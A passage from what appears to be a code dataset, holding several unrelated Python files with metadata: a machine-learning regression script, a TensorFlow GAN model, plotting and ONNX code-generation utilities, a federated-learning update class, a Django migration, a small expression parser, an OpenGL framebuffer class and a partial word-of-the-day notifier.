for last 1 week prediction': mape_for_1,\n 'MAPE for last 2 week prediction': mape_for_2,\n 'MAPE for last 4 week prediction': mape_for_4,\n 'MAPE for last 12 week prediction': mape_for_12,\n }\n \n return output_dict\n\n\n\n#Testing out various regression models\n\nregressor_rbf = SVR(kernel = 'rbf', gamma = 'auto')\nmatrix_rbf = lets_evaluate(regressor_rbf)\n\nregressor_poly_2 = SVR(kernel = 'poly', degree = 2, gamma = 'auto')\nmatrix_poly_2 = lets_evaluate(regressor_poly_2)\n\nregressor_poly_3 = SVR(kernel = 'poly', degree = 3, gamma = 'auto')\nmatrix_poly_3= lets_evaluate(regressor_poly_3)\n\nregressor_linear = SVR(kernel = 'linear', gamma = 'auto')\nmatrix_linear = lets_evaluate(regressor_linear)\n\n\n#Grid searching for the best C value for the RBF kernel\n\nparam_grid = {\"C\": [0.1, 1, 3, 5, 10]}\n\nreg = GridSearchCV(estimator = regressor_rbf, param_grid = param_grid, cv=KFold(), scoring = 'neg_mean_squared_error')\n\ngrid_search_results = reg.fit(X_7_std[0:-1, :], y_7_std_2[0:-1, :])\n\ngrid_search_results.best_score_\ngrid_search_results.best_params_\n\n\n#Grid searching for the best epsilon value\n\nparam_grid_2 = {\n \"C\": [1],\n \"epsilon\": [0.01, 0.1, 1, 3, 5, 10]\n }\n\nreg_2 = GridSearchCV(estimator = regressor_rbf, param_grid = param_grid_2, cv=KFold(), scoring = 'neg_mean_squared_error')\n\ngrid_search_results_2 = reg_2.fit(X_7_std[0:-1, :], y_7_std_2[0:-1, :])\n\ngrid_search_results_2.best_score_\ngrid_search_results_2.best_params_\n\n\n#Evaluating the final regressor with the tuned hyperparameters\n\nfinal_regressor = SVR(kernel = 'rbf', gamma = 'auto', C = 1.0, epsilon = 0.01)\nfinal_regressor.fit(X_7_std, y_7_std_2)\nmatrix_final = lets_evaluate(final_regressor)\n\n\n#Defining them like this for convenience\n\ny_7_std_2 = y_7_std_2[0:-1, :]\nX_7_std = X_7_std[0:-1, :]\n\n\n#Performing K-Fold cross-validation to check for the most robust model\n\nscores_rbf = sum(cross_val_score(regressor_rbf, X_7_std, y_7_std_2, cv=83, scoring = 'neg_mean_squared_error'))/83\nscores_poly_2 = sum(cross_val_score(regressor_poly_2, X_7_std, y_7_std_2, cv=83, scoring = 'neg_mean_squared_error'))/83\nscores_poly_3 = sum(cross_val_score(regressor_poly_3, X_7_std, y_7_std_2, cv=83, scoring = 'neg_mean_squared_error'))/83\nscores_linear = sum(cross_val_score(regressor_linear, X_7_std, y_7_std_2, cv=83, scoring = 'neg_mean_squared_error'))/83\nscores_final = sum(cross_val_score(final_regressor, X_7_std, y_7_std_2, cv=83, scoring = 'neg_mean_squared_error'))/83\n\n\n\n\n","sub_path":"Exchange Rate Prediction.py","file_name":"Exchange Rate Prediction.py","file_ext":"py","file_size_in_byte":6290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"540908539","text":"import tensorflow as tf\nfrom tensorflow.contrib.framework import arg_scope\n\nfrom layers import *\n\nclass Model(object):\n def __init__(self, config):\n self.task = config.task\n self.debug = config.debug\n self.reg_scale = config.reg_scale\n self.learning_rate = config.learning_rate\n\n self.layer_dict = {}\n\n input_dims = [\n None, config.input_height,\n config.input_width, config.input_channel,\n ]\n\n self.x = tf.placeholder(tf.uint8, [None, None, None, config.input_channel], 'x')\n self.x_history = tf.placeholder(tf.uint8, [None, None, None, config.input_channel], 'x_history')\n\n resize_dim = [config.input_height, config.input_width]\n self.resized_x = tf.image.resize_images(self.x, resize_dim)\n self.resized_x_history = tf.image.resize_images(self.x_history, resize_dim)\n\n self.normalized_x = normalize(self.resized_x)\n self.normalized_x_history = normalize(self.resized_x_history)\n\n self._build_model()\n self._build_steps()\n\n def build_optim(self):\n self.refiner_step = tf.Variable(0, name='refiner_step', trainable=False)\n self.discrim_step = tf.Variable(0, name='discrim_step', trainable=False)\n\n if self.task == \"generative\":\n optim = tf.train.GradientDescentOptimizer(self.learning_rate)\n self.refiner_optim = optim.minimize(\n self.refiner_loss,\n global_step=self.refiner_step,\n var_list=self.refiner_vars,\n )\n\n optim = tf.train.GradientDescentOptimizer(self.learning_rate)\n self.discrim_optim = optim.minimize(\n self.discrim_loss,\n global_step=self.discrim_step,\n var_list=self.discrim_vars,\n )\n elif self.task == \"estimate\":\n raise Exception(\"[!] Not implemented yet\")\n\n def _build_model(self):\n with arg_scope([resnet_block, conv2d, max_pool2d],\n layer_dict=self.layer_dict):\n self.R_x = self._build_refiner()\n self.denormalized_R_x = denormalize(self.R_x)\n\n self.D_x, self.D_x_logits = \\\n self._build_discrim(self.normalized_x, name=\"D_x\")\n self.D_R_x, self.D_R_x_logits = \\\n self._build_discrim(self.R_x, name=\"D_R_x\", reuse=True)\n self.D_x_history, self.D_x_history_logits = \\\n self._build_discrim(self.normalized_x_history, name=\"D_x_history\", reuse=True)\n\n #self.estimate_outputs = self._build_estimation_network()\n self._build_loss()\n\n def _build_loss(self):\n # Refiner loss\n zeros = tf.zeros_like(self.D_R_x)[:,:,:,0]\n ones = tf.ones_like(self.D_R_x)[:,:,:,0]\n\n fake_label = tf.stack([zeros, ones], axis=-1)\n real_label = tf.stack([ones, zeros], axis=-1)\n\n with tf.variable_scope(\"refiner\"):\n self.realism_loss = tf.reduce_sum(\n SE_loss(self.D_R_x_logits, real_label), [1, 2], name=\"realism_loss\")\n self.regularization_loss = 0\n # self.reg_scale * tf.reduce_sum(\n # self.R_x - self.normalized_x, [1, 2, 3],\n # name=\"regularization_loss\")\n\n self.refiner_loss = tf.reduce_mean(\n self.realism_loss, #+ self.regularization_loss,\n name=\"refiner_loss\")\n\n if self.debug:\n self.refiner_loss = tf.Print(self.refiner_loss, [self.R_x], \"R_x\")\n self.refiner_loss = tf.Print(self.refiner_loss, [self.D_R_x], \"D_R_x\")\n self.refiner_loss = tf.Print(self.refiner_loss, [self.normalized_x], \"normalized_x\")\n self.refiner_loss = tf.Print(self.refiner_loss, [self.regularization_loss], \"reg_loss\")\n\n self.refiner_summary = tf.summary.merge([\n tf.summary.image(\"input_images\", self.x),\n tf.summary.image(\"refined_images\", self.denormalized_R_x),\n tf.summary.scalar(\"realism_loss\", tf.reduce_mean(self.realism_loss)),\n tf.summary.scalar(\"regularization_loss\", tf.reduce_mean(self.regularization_loss)),\n tf.summary.scalar(\"loss\", tf.reduce_mean(self.refiner_loss)),\n ])\n\n # Discriminator loss\n with tf.variable_scope(\"discriminator\"):\n self.refiner_d_loss = tf.reduce_sum(\n SE_loss(self.D_R_x_logits, fake_label), [1, 2],\n name=\"refiner_d_loss\")\n self.refiner_history_d_loss = tf.reduce_sum(\n SE_loss(self.D_x_history_logits, fake_label), [1, 2],\n name=\"refiner_history_d_loss\")\n self.synthetic_d_loss = tf.reduce_sum(\n SE_loss(self.D_x_logits, real_label), [1, 2],\n name=\"synthetic_d_loss\")\n\n self.discrim_loss = tf.reduce_mean(\n self.refiner_d_loss + \\\n self.synthetic_d_loss, name=\"discrim_loss\")\n\n self.discrim_loss_with_history = tf.reduce_mean(\n self.refiner_d_loss + self.refiner_history_d_loss + \\\n self.synthetic_d_loss, name=\"discrim_loss_with_history\")\n\n self.discrim_summary = tf.summary.merge([\n tf.summary.scalar(\"refiner_d_loss\", self.refiner_d_loss),\n tf.summary.scalar(\"refiner_history_d_loss\", self.refiner_history_d_loss),\n tf.summary.scalar(\"synthetic_d_loss\", self.synthetic_d_loss),\n tf.summary.scalar(\"discrim_loss\", self.discrim_loss),\n tf.summary.scalar(\"discrim_loss_with_history\", self.discrim_loss_with_history),\n ])\n\n def _build_steps(self):\n def run(sess, inputs, fetch, input_op,\n summary_op, summary_writer, output_op=None):\n if summary_writer is not None:\n fetch['summary'] = summary_op\n if output_op is not None:\n fetch['output'] = output_op\n\n result = sess.run(fetch, feed_dict={ input_op: inputs })\n if result.has_key('summary'):\n summary_writer.add_summary(result['summary'], result['step'])\n summary_writer.flush()\n return result\n\n def train_refiner(sess, inputs, summary_writer=None, with_output=False):\n fetch = {\n 'loss': self.refiner_loss,\n 'optim': self.refiner_optim,\n 'step': self.refiner_step,\n }\n return run(sess, inputs, fetch, self.x,\n self.refiner_summary, summary_writer,\n output_op=self.R_x if with_output else None)\n\n def test_refiner(sess, inputs, summary_writer=None, with_output=False):\n fetch = {\n 'loss': self.refiner_loss,\n 'step': self.refiner_step,\n }\n return run(sess, inputs, fetch, self.x,\n self.refiner_summary, summary_writer,\n output_op=self.R_x if with_output else None)\n\n def train_discrim(sess, inputs, summary_writer=None):\n fetch = {\n 'loss': self.discrim_loss,\n 'optim': self.discrim_optim,\n 'step': self.discrim_step,\n }\n return run(sess, inputs, fetch, self.x,\n self.discrim_summary, summary_writer)\n\n def test_discrim(sess, inputs, summary_writer=None):\n fetch = {\n 'loss': self.discrim_loss,\n 'step': self.discrim_step,\n }\n return run(sess, inputs, fetch, self.x,\n self.discrim_summary, summary_writer=summary_writer)\n\n self.train_refiner = train_refiner\n self.test_refiner = test_refiner\n self.train_discrim = train_discrim\n self.test_discrim = test_discrim\n\n def _build_refiner(self):\n layer = self.normalized_x\n with tf.variable_scope(\"refiner\") as sc:\n layer = repeat(layer, 5, resnet_block, scope=\"resnet\")\n output = conv2d(layer, 1, 1, 1, scope=\"conv_1\")\n self.refiner_vars = tf.contrib.framework.get_variables(sc)\n return output \n\n def _build_discrim(self, layer, name, reuse=False):\n with tf.variable_scope(\"discriminator\") as sc:\n with arg_scope([conv2d], weights_initializer=tf.contrib.layers.xavier_initializer()):\n layer = conv2d(layer, 96, 3, 2, scope=\"conv_1\", name=name, reuse=reuse)\n layer = conv2d(layer, 64, 3, 2, scope=\"conv_2\", name=name, reuse=reuse)\n layer = max_pool2d(layer, 3, 1, scope=\"max_1\", name=name)\n layer = conv2d(layer, 32, 3, 1, scope=\"conv_3\", name=name, reuse=reuse)\n layer = conv2d(layer, 32, 1, 1, scope=\"conv_4\", name=name, reuse=reuse)\n logits = conv2d(layer, 2, 1, 1, scope=\"conv_5\", name=name, reuse=reuse)\n output = tf.nn.softmax(logits, name=\"softmax\")\n self.discrim_vars = tf.contrib.framework.get_variables(sc)\n return output, logits\n\n def _build_estimation_network(self):\n layer = self.normalized_x\n with tf.variable_scope(\"estimation\"):\n layer = conv2d(layer, 96, 3, 2, scope=\"conv_1\")\n layer = conv2d(layer, 64, 3, 2, scope=\"conv_2\")\n layer = max_pool2d(layer, 64, 3, scope=\"max_1\")\n layer = conv2d(layer, 32, 3, 1, scope=\"conv_3\")\n layer = conv2d(layer, 32, 1, 1, scope=\"conv_4\")\n layer = conv2d(layer, 2, 1, 1, activation_fn=slim.softmax)\n return layer\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"457736418","text":"#!/usr/local/bin/python2.7\n\nfrom argparse import ArgumentParser\nfrom multiprocessing import Pool\nfrom os import popen, system\nfrom os.path import basename, exists\nfrom sys import exit, stderr, stdout\nimport random\nfrom pprint import pprint\nimport operator\nimport math\n\ndef get_range( cluster_results_fn ):\n with open( cluster_results_fn, \"r\" ) as f:\n xmax = 0\n for l in f:\n if l.startswith(\"#\"): continue\n ls = l.split()\n res = int( ls[0] )\n if res > xmax:\n xmax = res\n return xmax+8\n\ndef plot( coverage_fn, common_core_fn, cluster_results_fn, tag='plot' ):\n\n xmax = get_range( cluster_results_fn )\n\n plt = open( \"%s.plt\" % tag, \"w\" )\n plt.write(\"set term post enhanced color 'Helvetica' 15 landscape\\n\")\n plt.write(\"set out '%s.eps'\\n\" % tag )\n plt.write(\"set title '%s'\\n\" % tag.replace(\"_\", \" \") )\n plt.write(\"set xtics 25\\n\")\n plt.write(\"set xlabel 'Residue'\\n\" )\n plt.write(\"set xrange [-2:%s]\\n\" % xmax )\n plt.write(\"set ylabel 'RMSD'\\n\")\n plt.write(\"set yrange [0:45]\\n\")\n plt.write(\"set style fill transparent solid 0.5 noborder\\n\")\n plt.write(\"set boxwidth 1.2 relative\\n\")\n plt.write(\"set tics nomirror out\\n\")\n plt.write(\"plot \\\\\\n\")\n plt.write(\"'%s' u 1:2 w boxes lc rgb '#add8e6' not, \\\\\\n\" % coverage_fn )\n plt.write(\"'%s' u 1:3 w p pt 7 ps 1.0 lc rgb '#ff80ff' not, \\\\\\n\" % common_core_fn )\n plt.write(\"'%s' u 1:3 w p ps 0.5 lw 1 lt 1 lc 0 pt 65 not\" % cluster_results_fn )\n plt.write(\"\\n\")\n plt.close()\n\n system(\"gnuplot %s.plt\" % tag )\n system(\"ps2pdf %s.eps\" % tag )\n \n\nif __name__==\"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\"-t\", \"--tag\", default=\"pos_rmsd_plot\" )\n parser.add_argument(\"-c\", \"--coverage_fn\", default=\"residue_coverage.txt\" )\n parser.add_argument(\"-k\", \"--common_core_fn\", required=True, default=\"find_common_core_cal_distance_results.txt\" )\n parser.add_argument(\"-s\", \"--cluster_results_fn\", default=\"all_clustering_selected_b50_e050_r2.sc\" )\n \n args = parser.parse_args()\n \n assert exists( args.common_core_fn )\n assert exists( args.cluster_results_fn )\n\n #system(\"cal_lowrmsd_coverage.py -f %s -r 3 -p 1 -t 100 --plot -c --yaxis 50 > %s\" %( args.common_core_fn, args.coverage_fn ) )\n assert exists( args.coverage_fn )\n plot( args.coverage_fn, args.common_core_fn, args.cluster_results_fn, args.tag )\n\n","sub_path":"denovo_utils/plotting/make_pos_rmsd_plot.py","file_name":"make_pos_rmsd_plot.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"389968211","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Python version: 3.6\n\nimport torch\nfrom torch import nn, autograd\nfrom torch.utils.data import DataLoader, Dataset\nimport numpy as np\nfrom sklearn import metrics\n\n\nclass DatasetSplit(Dataset):\n def __init__(self, dataset, idxs):\n self.dataset = dataset\n self.idxs = list(idxs)\n\n def __len__(self):\n return len(self.idxs)\n\n def __getitem__(self, item):\n image, label = self.dataset[self.idxs[item]]\n return image, label\n\n\nclass LocalUpdate(object):\n def __init__(self, args, dataset, idxs, tb):\n self.args = args\n self.loss_func = nn.CrossEntropyLoss()\n self.ldr_train, self.ldr_val, self.ldr_test = self.train_val_test(dataset, list(idxs))\n self.tb = tb\n\n def train_val_test(self, dataset, idxs):\n # split train, validation, and test\n idxs_train = idxs[:420]\n idxs_val = idxs[420:480]\n idxs_test = idxs[480:]\n train = DataLoader(DatasetSplit(dataset, idxs_train), batch_size=self.args.local_bs, shuffle=True)\n val = DataLoader(DatasetSplit(dataset, idxs_val), batch_size=int(len(idxs_val)/10), shuffle=True)\n test = DataLoader(DatasetSplit(dataset, idxs_test), batch_size=int(len(idxs_test)/10), shuffle=True)\n return train, val, test\n\n def update_weights(self, net):\n net.train()\n # train and update\n optimizer = torch.optim.SGD(net.parameters(), lr=self.args.lr, momentum=0.5)\n\n epoch_loss = []\n for iter in range(self.args.local_ep):\n batch_loss = []\n for batch_idx, (images, labels) in enumerate(self.ldr_train):\n images, labels = images.to(self.args.device), labels.to(self.args.device)\n net.zero_grad()\n log_probs = net(images)\n loss = self.loss_func(log_probs, labels)\n loss.backward()\n optimizer.step()\n # if self.args.gpu != -1:\n # loss = loss.cpu()\n if self.args.verbose and batch_idx % 10 == 0:\n print('Update Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n iter, batch_idx * len(images), len(self.ldr_train.dataset),\n 100. * batch_idx / len(self.ldr_train), loss.item()))\n self.tb.add_scalar('loss', loss.item())\n batch_loss.append(loss.item())\n epoch_loss.append(sum(batch_loss)/len(batch_loss))\n return net.state_dict(), sum(epoch_loss) / len(epoch_loss)\n\n def test(self, net):\n # optimizer = torch.optim.SGD(net.parameters(), lr=self.args.lr, weight_decay=2)\n # for iter in range(self.args.local_ep):\n # for batch_idx, (images, labels) in enumerate(self.ldr_train):\n # if self.args.gpu != -1:\n # images, labels = images.cuda(), labels.cuda()\n # images, labels = autograd.Variable(images), autograd.Variable(labels)\n # net.zero_grad()\n # log_probs = net(images)\n # loss = self.loss_func(log_probs, labels)\n # loss.backward()\n # optimizer.step()\n\n for batch_idx, (images, labels) in enumerate(self.ldr_test):\n images, labels = images.to(self.args.device), labels.to(self.args.device)\n log_probs = net(images)\n loss = self.loss_func(log_probs, labels)\n # if self.args.gpu != -1:\n # loss = loss.cpu()\n # log_probs = log_probs.cpu()\n # labels = labels.cpu()\n y_pred = torch.argmax(log_probs.data, dim=1)\n acc = metrics.accuracy_score(y_true=labels.data, y_pred=y_pred)\n return acc, loss.item()\n","sub_path":"models/Update.py","file_name":"Update.py","file_ext":"py","file_size_in_byte":3762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"579659335","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('home', '0004_auto_20160314_0922'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Contact',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=30)),\n ('email', models.EmailField(max_length=30, verbose_name=b'Email')),\n ('phone', models.CharField(max_length=10)),\n ('message', models.TextField()),\n ],\n ),\n migrations.AlterField(\n model_name='carbooking',\n name='date',\n field=models.DateField(default=b'2016-03-16'),\n ),\n ]\n","sub_path":"src/home/migrations/0005_auto_20160316_1219.py","file_name":"0005_auto_20160316_1219.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"409174048","text":"import os\nimport sys\nimport re\nimport pathlib\nfrom .OperatorHeader import OperatorHeader\nfrom .OperatorTypeResolver import OperatorTypeResolver\nfrom .OperatorSanityCheck import OperatorSanityCheck\nfrom .OperatorSets import OperatorSets\nfrom .OnnxWrapper import OnnxSchema\nfrom . import args\n\ndef note(text, verbosity=0 ):\n if verbosity <= args.verbose:\n print(text)\n\ndef warning(text, verbosity=0):\n if verbosity <= args.verbose:\n print(text, file=sys.stderr)\n\ndef fatal(text, error=1):\n print(text, file=sys.stderr)\n sys.exit(error)\n\nif args.onnx:\n sys.path.insert(0, os.path.realpath(args.onnx[0]))\n try:\n import onnx_cpp2py_export\n except:\n fatal(\"could not import onnx_cpp2py_export!\")\nelse:\n try:\n from onnx import onnx_cpp2py_export\n except:\n fatal(\"could not import onnx_cpp2py_export from onnx!\")\n\nnote(f\"onnx: {args.onnx}\",3)\nnote(f\"verbose: {args.verbose}\",3)\nnote(f\"header: {args.header}\",3)\nnote(f\"no_header: {args.no_header}\",3)\nnote(f\"check: {args.check}\",3)\nnote(f\"no_check: {args.no_check}\",3)\nnote(f\"resolve: {args.resolve}\",3)\nnote(f\"no_resolve: {args.no_resolve}\",3)\nnote(f\"sets: {args.sets}\",3)\nnote(f\"no_sets: {args.no_sets}\",3)\nnote(f\"force: {args.force}\",3)\nnote(f\"include: {args.include}\",3)\nnote(f\"exclude: {args.exclude}\",3)\nnote(f\"version: {args.version}\",3)\nnote(f\"domains: {args.domains}\",3)\nnote(f\"path: {args.path}\",3)\n\nall_schemas = [ OnnxSchema(s) for s in onnx_cpp2py_export.defs.get_all_schemas_with_history()]\nnum_schemas = len(all_schemas)\n\ndomain2name2version2schema = {}\nfor schema in all_schemas:\n name2version2schema = domain2name2version2schema.setdefault(schema.domain,{})\n version2schema = name2version2schema.setdefault(schema.name,{})\n version2schema[schema.version] = schema\n\nnote(\"selecting domains\")\ndomains = domain2name2version2schema.keys()\nnote(f\"onnx operator schemas have {len(domains)} domains: {', '.join(domains)}\",2)\nif \"all\" in args.domains:\n domains = domains\nelse:\n domains = set(args.domains)\n\ndelete_domains = []\nfor domain in domain2name2version2schema.keys():\n if domain in domains:\n note(f\"including domain '{domain}'\",2)\n else:\n note(f\"excluding domain '{domain}'\",3)\n delete_domains.append(domain)\nfor domain in delete_domains:\n del domain2name2version2schema[domain]\n\nnote(\"including onnx operator schemas\",1)\ndelete_names = {}\nfor domain, name2version2schema in domain2name2version2schema.items():\n for name in name2version2schema.keys():\n included = False\n for pattern in set(args.include):\n if re.match(pattern,name):\n note(f\"included '{domain}' operator schema '{name}' by pattern '{pattern}'\",2)\n included = True\n break\n if not included:\n note(f\"no pattern included '{domain}' operator schema {name}\",3)\n delete_names.setdefault(domain,[]).append(name)\nfor domain, names in delete_names.items():\n for name in names:\n del domain2name2version2schema[domain][name]\n\nnote(\"excluding onnx operator schemas\",1)\ndelete_names = {}\nfor domain, name2version2schema in domain2name2version2schema.items():\n for name in name2version2schema.keys():\n excluded = False\n for pattern in args.exclude:\n if re.match(pattern,name):\n note(f\"excluded '{domain}' operator schema '{name}' by pattern '{pattern}'\",2)\n excluded = True\n delete_names.setdefault(domain,[]).append(name)\n break\n if not excluded:\n note(f\"no pattern excluded '{domain}' operator schema {name}\",3)\nfor domain, names in delete_names.items():\n for name in names:\n del domain2name2version2schema[domain][name]\n\nnote(\"selecting onnx operator schema versions\")\ndelete_versions = {}\nfor domain, name2version2schema in domain2name2version2schema.items():\n for name, version2schema in name2version2schema.items():\n versions = version2schema.keys()\n note(f\"'{domain}' operator schema '{name}' has {len(versions)} version(s): {', '.join([str(v) for v in versions])}\",2)\n if args.version[-1] == \"all\":\n versions = versions\n elif args.version[-1] == \"latest\":\n versions = [max(versions)]\n else:\n for version in range(int(args.version[-1]),0,-1):\n if version in versions:\n versions = [version]\n break\n for version in version2schema.keys():\n if version in versions:\n note(f\"included '{domain}' operator schema '{name}' version {version}\",2)\n else:\n note(f\"excluded '{domain}' operator schema '{name}' version {version}\",3)\n delete_versions.setdefault(domain,{}).setdefault(name,[]).append(version)\nfor domain, name2version in delete_versions.items():\n for name, versions in name2version.items():\n for version in versions:\n del domain2name2version2schema[domain][name][version]\n\n\nschemas = []\nfor name2version2schema in domain2name2version2schema.values():\n for version2schema in name2version2schema.values():\n for schema in version2schema.values():\n schemas.append(schema)\n\nnote(\"generating onnx operator headers\")\npath = f\"{args.path[-1]}/{args.header[-1]}/\"\nheaders = [ OperatorHeader(s,path) for s in schemas ]\nnote(\"generating onnx operator type resolvers\")\npath = f\"{args.path[-1]}/{args.resolve[-1]}/\"\nresolvers = [ OperatorTypeResolver(s,path) for s in schemas ]\nnote(\"generating onnx operator sanity checks\")\npath = f\"{args.path[-1]}/{args.check[-1]}/\"\nchecks = [ OperatorSanityCheck(s,path) for s in schemas ]\nnote(\"generating onnx operator sets\")\npath = f\"{args.path[-1]}/{args.sets[-1]}/\"\nsets = OperatorSets(headers,path)\n\nfiles = []\nif not args.no_header:\n for h in headers:\n files.append(h)\nif not args.no_resolve:\n for r in resolvers:\n files.append(r)\nif not args.no_check:\n for c in checks:\n files.append(c)\nif not args.no_sets:\n files.append(sets)\n\nwritecount = 0\nnote(\"Writing files\",1)\nif not args.path[-1]:\n warning(\"skipping write because args.path is not set\")\nelse:\n for obj in files:\n path = obj.filename().resolve()\n if path.exists() and not args.force:\n warning(f\"skipping existing file '{path}'\",1)\n continue\n note(f\"writing file {path}\",3)\n os.makedirs(path.parent,exist_ok=True)\n path.open(\"w\").write(obj.text())\n writecount += 1\nnote(f\"wrote {writecount} of {len(files)} files\")\n","sub_path":"scripts/onnx_generator/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":6605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"467834439","text":"import math\nimport operator\nimport string\nimport tpg\nimport sys\n\ndef make_op(op):\n\treturn {\n\t\t\t'+': lambda x,y: x+y,\n\t\t\t'-': lambda x,y: x-y,\n\t\t\t'*': lambda x,y: x*y,\n\t\t\t'/': lambda x,y: x/y,\t\t\n\t\t\t'xor': operator.xor,\n\t\t}[op]\nclass TheLanguage(tpg.Parser):\n\tr\"\"\"\n\t\tseparator space\t'\\s+' ;\n\t\ttoken number: '\\d+' int;\n\t\ttoken add\t'[+-]'\tmake_op ;\n\t\ttoken mul\t'[*/%]' make_op ;\n\t\ttoken xor_op\t'xor' make_op;\n\t\tSTART/e -> Term/e ;\n\t\tTerm/t -> Fact/t ( add/op Fact/f $t=op(t,f)$ )* ;\n\t\tFact/f -> Atom/f ( mul/op Atom/a $f=op(f,a)$ )* ;\n\t\tAtom/a -> number/a | '\\(' Term/a '\\)' ;\n\t\"\"\"\n\t\t\nif tpg.__python__ == 3:\n\toperator.div = operator.truediv\n\traw_input = input\n\ndef main(argv):\n print (\"HW4 (TPG Parser for 'The Language')\")\n lang = TheLanguage()\n fileName = argv[1]\n export = \"\"\n outputFileName = \"output.txt\"\n f = open(fileName,\"r\")\n for line in f:\n try:\n export += str(lang(line)) + \"\\n\"\n except Exception:\n errorText = str(tpg.exc())\n if \"SyntacticError\" in errorText:\n export += \"SYNTAX ERROR\"+\"\\n\"\n if \"LexicalError\" in errorText:\n export += \"SEMANTIC ERROR\"+\"\\n\"\n f.close()\n f = open(outputFileName, \"w\")\n f.write(export)\n f.close()\nmain(sys.argv)\n\n#Test Input\n#1 - 2 +3 WORKS\n#1 2 3 need to add syntax error catch\n#42 + \"Green\" Semantic error catch\n#1-(2+3) WORKS\n#\"Hello\"+\"\"+\"World.\"\n#[1.2,3][1] + 40 (Add Array support)\n#3 xor 5\n\n","sub_path":"Python/hw4/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"19608699","text":"# coding=utf-8\n# frame_buffer.py\n# created on 2020/12/26\n# author @zoloypzuo\n# usage: frame_buffer\nfrom OpenGL import GL as gl\n\n\nclass FrameBuffer(object):\n def __init__(self, width=0, height=0, samples=1, swap_chain_target=False):\n self.handle = 0\n self.color_attachment_handle = 0\n self.depth_attachment_handle = 0\n self.width = width\n self.height = height\n self.samples = samples\n self.swap_chain_targets = swap_chain_target\n self.initialize()\n\n def initialize(self):\n if self.handle:\n self.finalize()\n self.handle = gl.glGenFramebuffers(1)\n\n self.color_attachment_handle = color_attachment_handle = gl.glCreateTextures(gl.GL_TEXTURE_2D, 1)\n gl.glBindTexture(gl.GL_TEXTURE_2D, color_attachment_handle)\n gl.glTexImage2D(gl.GL_TEXTURE_2D, 0, gl.GL_RGBA8, self.width, self.height, 0, gl.GL_RGBA,\n gl.GL_UNSIGNED_BYTE, None)\n gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_MIN_FILTER, gl.GL_LINEAR)\n gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_MAG_FILTER, gl.GL_LINEAR)\n\n gl.glFramebufferTexture2D(gl.GL_FRAMEBUFFER, gl.GL_COLOR_ATTACHMENT0, gl.GL_TEXTURE_2D,\n color_attachment_handle, 0)\n\n self.depth_attachment_handle = depth_attachment_handle = gl.glCreateTextures(gl.GL_TEXTURE_2D, 1)\n gl.glBindTexture(gl.GL_TEXTURE_2D, depth_attachment_handle)\n gl.glTexStorage2D(gl.GL_TEXTURE_2D, 1, gl.GL_DEPTH24_STENCIL8, self.width, self.height)\n gl.glFramebufferTexture2D(gl.GL_FRAMEBUFFER, gl.GL_DEPTH_STENCIL_ATTACHMENT, gl.GL_TEXTURE_2D,\n depth_attachment_handle, 0)\n\n gl.glBindFramebuffer(gl.GL_FRAMEBUFFER, 0)\n\n def finalize(self):\n gl.glDeleteFramebuffers(1, self.handle)\n gl.glDeleteTextures(1, self.color_attachment_handle)\n gl.glDeleteTextures(1, self.depth_attachment_handle)\n\n def bind(self):\n gl.glBindFramebuffer(gl.GL_FRAMEBUFFER, self.handle)\n gl.glViewport(gl.GL_FRAMEBUFFER, 0)\n\n def unbind(self):\n gl.glBindFramebuffer(gl.GL_FRAMEBUFFER, 0)\n\n def resize(self, width, height):\n if width <= 0 or height <= 0 or width > 8192 or height > 8192:\n return\n self.width = width\n self.height = height\n self.initialize()\n","sub_path":"Prototype/framework/renderer/frame_buffer.py","file_name":"frame_buffer.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"91882291","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 9 13:21:23 2021\n\n@author: Poulami\n\"\"\"\n\nimport urllib.request, urllib.error\n#import bs4\n#import plyer\nfrom bs4 import BeautifulSoup\nimport datetime\nfrom plyer import notification\nimport time\n\n\ndef WordOfTheDay(f):\n content=f.read()\n soup = BeautifulSoup(content,'lxml')\n word_html=soup.findAll(\"div\",{'class':\"word-and-pronunciation\"})\n defination_html=soup.findAll(\"div\",{'class':\"wod-definition-container\"})\n for x in word_html:\n word=(x.find('h1').text)\n break\n definition=[]\n for x in defination_html:\n for col in x.find_all('p'):\n if ':' in col.text[0:6]:\n definition.append(col.text)\n definition_val=\"\\n\".join(definition)\n while (True):\n notification.notify(\n #title of the notification,\n title = \"Word Of The Day For {}: {}\".format(datetime.date.today().strftime(\"%d, %b %Y\"),word.upper()),\n #the body of the notification\n message = \"Definition: {defi}\".format(defi=definition_val), \n #creating icon for the notification\n #we need to download a icon of ico file format\n app_icon = \"Bell.ico\",\n # the notification stays for 50sec\n timeout = 60\n )\n #sleep for 4 hrs => 60*60*4 sec\n #notification repeats after every 4hrs\n time.sleep(60*60*4)\n\nif __name__==\"__main__\":\n url = 'https://www.merriam-webster.com/word-of-the-day'\n try:\n conn = 